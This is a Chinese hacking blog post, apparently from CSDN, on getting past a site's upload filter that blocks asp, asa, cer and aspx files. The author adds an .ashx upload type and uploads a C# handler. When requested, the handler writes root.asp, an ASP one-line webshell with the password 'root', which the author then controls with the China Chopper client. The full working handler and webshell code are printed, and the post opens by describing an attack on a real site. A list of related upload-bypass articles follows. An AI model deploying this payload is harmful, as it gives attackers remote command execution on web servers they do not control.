滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型

最新推荐文章于 2025-03-16 14:01:26 发布
最新推荐文章于 2025-03-16 14:01:26 发布
阅读量1k 收藏
点赞数
分类专栏: hacking 文章标签: 脚本 php file class asp c#
本文介绍了一种通过ASP脚本漏洞利用上传特定类型文件(如ashx),进而生成一句话木马的技术。详细阐述了上传过程、木马生成原理及使用方法,并提供了代码示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

今天日一站


发现后台可以设置上传类型,但是asp,asa,cer等等都不行,上传之后就提示下载


尝试着关闭了下了,还是不行,后来找到了一位前辈写的文章


过滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型,上传一个ashx脚本上去,
脚本内容如下:
www.92hack.net/ashx.txt
然后访问上传后的ashx文件,就会在同目录下生成一个root.asp的一句话木马,然后使用一句话木马客户端连接即可。利用方面就大家自由发挥了!
 


密码为root,果断菜刀连之


<%@ WebHandler Language="C#" class="Handler" %>


using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {


public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";


StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("<%response.clear:execute request(\"root\"):response.End%>");
file1.Flush();
file1.Close();


}


public bool IsReusable {
get {
return false;
}
}


}











没有最牛逼的方法,只有最爱思想的脑子


                                         by:狗一样的男人
4.8文件上传
Sumarua的博客
07-04 1249
文章目录4.8文件上传4.8.1. 文件类型检测绕过4.8.1.1. 更改请求绕过4.8.1.2. Magic检测绕过4.8.1.3. 后缀绕过4.8.1.4. 系统命名绕过4.8.1.5. .user.ini4.8.1.6. WAF绕过4.8.1.7. 竞争上传绕过4.8.2. 攻击技巧4.8.2.1. Apache重写GetShell4.8.2.2. 软链接任意读文件4.8.3. 防护技巧4.8.4. 参考链接 4.8文件上传 4.8.1. 文件类型检测绕过 4.8.1.1. 更改请求绕过 有的站点仅仅
51.网络安全渗透测试—[文件上传篇1]—[文件上传过程详解/造成漏洞原因/文件上传绕过姿势]
qwsn
08-07 2785
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、文件上传过程详解 1、文件上传过程:`5步` 2、客户端上传表单:`upload.html` 3、服务器接收资源的脚本程序:`upload.php` 4、文件上传错误代码:`5类值` 5、网站文件常见的扩展名:`asp/php/........` 二、文件上传绕过姿势 造成漏洞的原因和绕过姿势
GitHub突破解决上传100M限制
HealerJean梦想博客
08-29 563
前言 博主github 博主个人博客http://blog.healerjean.com 官方方案 https://git-lfs.github.com/ HealerJean@MI-201902210704 MINGW64 /d/study/HealerJean.github.io/_posts/DDKJ (master) $ git push origin Enumerating object...
aspx,ascx和ashx使用小结
weixin_34238633的博客
07-07 336
asp.net开发的对.aspx,.ascx和.ashx都不会陌生。关于它们,网上有很多文章介绍。“纸上得来终觉浅,绝知此事要躬行”,下面自己总结一下做个笔记。1、.aspxWeb窗体设计页面。Web窗体页由两部分组成:视觉元素(html、服务器控件和静态文本)和该页的编程逻辑(VS中的设计视图和代码视图可分别看到它们对应得文件)。VS将这两个组成部分分别存储在一个单独的文件中。视觉元素在.as...
新方法突破上传限制
weixin_30929195的博客
07-02 328
下午,朋友丢来一个后台,说搞不定,要拿个SHELL。 偶进去翻了一下,没发现太多利用的地方,就一个添加文章和上传图片的地方。 添加文章直接生成一个ASPX文件,但不知道哪些东西可以写进去,没源码,随便试了下,插了几个代码都没成功,估计不是有过就是直接写进库了,于是放弃这条路。 来看看上传上传一个正常的图片可以直接上传ASP马无论改名与否都直接报错。 看来是检查是不是图片了,这...
双文件上传突破
07-24
双文件上传突破
ashx上传文件大小限制
thistest9的博客
01-16 983
一、 修改web.config,增大可上传文件的大小限制,增大执行时间限制  &lt;httpRuntime maxRequestLength="2048000" executionTimeout="600"/&gt; 二、IIS里改这个地方: &lt;requestLimits maxAllowedContentLength="99000000" /&gt;    ...
WEBshell与文件上传漏洞
LJH1999ZN的博客
02-19 5179
一、文件上传漏洞的原理 如果web应用程序对上传文件的安全性没有过和校验,攻击者可以通过上传webshell恶意文件对服务器进行攻击 。 二、文件上传的原理 1.有文件上传功能 2.上传文件的目录能解析脚本文件 3.能访问到上传的文件 三、文件上传攻击 文件上传防护和绕过手段 1.文件上传漏洞--绕过前端js检测 由于网站客户端对文件的上传类型做了限制,不允许我们上传.php文件,我们可以通过bp抓取发送数据包,然后将数据包做改变即可 ...
网络安全笔记-99-渗透-文件上传
wwxxee
01-05 1203
文件上传漏洞 漏洞概述 文件上传是Web 应用的必备功能之一,比如上传头像显示个性化、上传附件共享文件、上传脚本更新网站。如果服务器配置不当或者没有进行足够的过,Web 用户就可以上传任意文件,包括恶意脚本文件、exe 程序等,这就造成了文件上传漏洞。 漏洞成因 服务器配置不当 对上传文件没有限制 没有考虑系统特性和验证以及过不严格导致限制被绕过 漏洞危害 非法用户可以利用上传的恶意脚本文件控制整个网站,甚至可以控制服务器。这个恶意脚本文件被称为webshell,也可以将webshell脚本称为一个
国信安web安全——文件上传漏洞
学习记录
03-01 603
文件上传漏洞 一、漏洞概念 文件上传漏洞是指用户上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。常见场景是web服务器允许用户上传图片或者普通文本文件保存,而用户绕过上传机制上传恶意代码并执行从而控制服务器。 二、漏洞原理 网站Web应用都有一些文件上传功能,比如文档、图片、头像、视频上传,当上传功能的实现代码没有严格校验上传文件的后缀和文件类型,此时攻击者就可以上传一个webshell到一个Web可访问的目录上,并将恶意文件传递给如PHP解释器去执行,之后就可以在服务器上执行恶意
渗透中 常见上传突破总汇
weixin_30883777的博客
08-03 110
1,检测javascript类型的绕过(客户端)–通常post请求发送到web服务器,客户端javascript验证上传1.php弹窗说上传格式错误,只允许.jpg,.jpeg等格式的文件上传一句话1.php–>1.jpg 然后burp抓包1.jpg–>1.php,这样就绕过了js检测或者F12查看源代码,找到onsubmit=”return checkFile()”,将它删除并编辑保...
文件上传漏洞:突破JS本地验证
自学编程_youkewang.top
03-12 2289
关于文件上传漏洞不多说了吧,搞web安全的都应该接触过,在上传漏洞中我们常碰到的一种js验证比较烦人,对于网站是否启用的js验证的判断方法,无法就是利用它的判断速度来判断,因为js验证用于客户端本地的验证,所以你如果上传一个不正确的文件格式,它的判断会很快就会显示出来你上传的文件类型不正确,那我们就能判断出该网站是使用的js验证,ok,今天就教大家怎么突破它。废话不多说了吧,直接上测试用的代码吧。...
asa,cer,cdx,php,aspx脚本类型上传情况下添加一个ashx上传类型
weixin_30549657的博客
04-27 110
asa,cer,cdx,php,aspx脚本类型上传情况下添加一个ashx上传类型上传一个ashx脚本上去, 脚本内容如下:<%@ WebHandler Language="C#" class="Handler" %>using System;using System.Web;using System.IO;public class Handler : IHttpHan...
php 突破上传,分享上传图片shell的绕过过的几种方法
weixin_42396180的博客
03-11 394
一般网站图片上传功能都对文件进行过,防止webshell写入。但不同的程序对过也不一样,如何突破过继续上传?本文总结了七种方法,可以突破!1、文件头+GIF89a法。(php)//这个很好理解,直接在php马最前面写入gif89a,然后上传dama.php2、使用edjpgcom工具向图片注入代码。(php)//edjpgcom修改,加入php一句话保存为dama.php3、cmd命令下co...
渗透测试-Web文件上传漏洞
zhenghdmax的博客
03-16 550
通过综合运用多种安全策略,如严格限制上传文件的类型、大小,对文件内容进行杀毒扫描,设置合理的文件存储路径和权限,监控上传日志等,可以有效降低文件上传漏洞的风险,保障Web应用的安全性。大部分网站和应用系统都有上传功能,若实现代码没有严格限制用户上传的文件后缀及类型,攻击者可上传任意PHP脚本文件到可通过Web访问的目录,并让这些文件被PHP解释器执行,从而在远程服务器上执行任意PHP脚本。- 运行上传文件包含脚本木马和一句话内容马:先上传txt后缀的木马文件,再上传包含该txt文件路径的php文件。
文件上传20个绕过方法(upload-labs)
qq_41672971的博客
10-28 1458
文件上传20关
一篇文章教你学会文件上传漏洞
a770067334的博客
06-21 625
小马体积非常小,只有2KB那么大,隐蔽性也非常的好,因为小马的作用很简单,就是一个上传功能,就没有其它的了,它的作用仅仅是用来上传文件,所以也能过一些安全扫描。小马是为了方便上传大马的,因为很多漏洞做了上传限制,大马上传不了,所以就只能先上传小马,再接着通过小马上传大马了。我们这里说的小马和大马是指网页类型中的,小马就是为了配合上传大马的,这是它最主要的作用,还有就是小马可以当做备用的后门来使用,一般大马容易被发现,而小马则更容易隐藏在系统的文件夹中。的管理,解压缩,和提权等功能,都非常强大。
本地 HTTPS / FTP 协议突破云盘上传限制!
博客园:https://www.cnblogs.com/GalGameBoy | 独立游戏开发者
03-18 1133
此文为我用了一段时间的摸索、不对请指正。
上传php文件不能解析,浅谈文件解析及上传漏洞
weixin_34416909的博客
03-12 4311
中国菜刀在web渗透中,我最期待两种漏洞,一种是任意命令执行漏洞,如struct2漏洞等;另一种是文件上传漏洞,因为这两种漏洞都是获取服务器权限最快最直接的方法。而对于任意命令执行漏洞,如果是通过内网映射出来的,那么可能还需要使用不同的手段进行木马文件上传,从而获取webshell,通过webshell进行端口转发或者权限提升。本文主要是介绍文件上传中的个人利用技巧经验汇总,讲解分为两部分:一部份...
写出一段cmd脚本,导出文件夹下cer文件的详细信息
最新发布
03-22
好的,用户想要写一段CMD脚本,导出文件夹下所有cer文件的详细信息。我需要仔细想想怎么解决这个问题。 首先,用户的需求是获取cer文件的详细信息,包括文件名、大小、修改日期等。CMD下常用的命令是dir,可以列出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值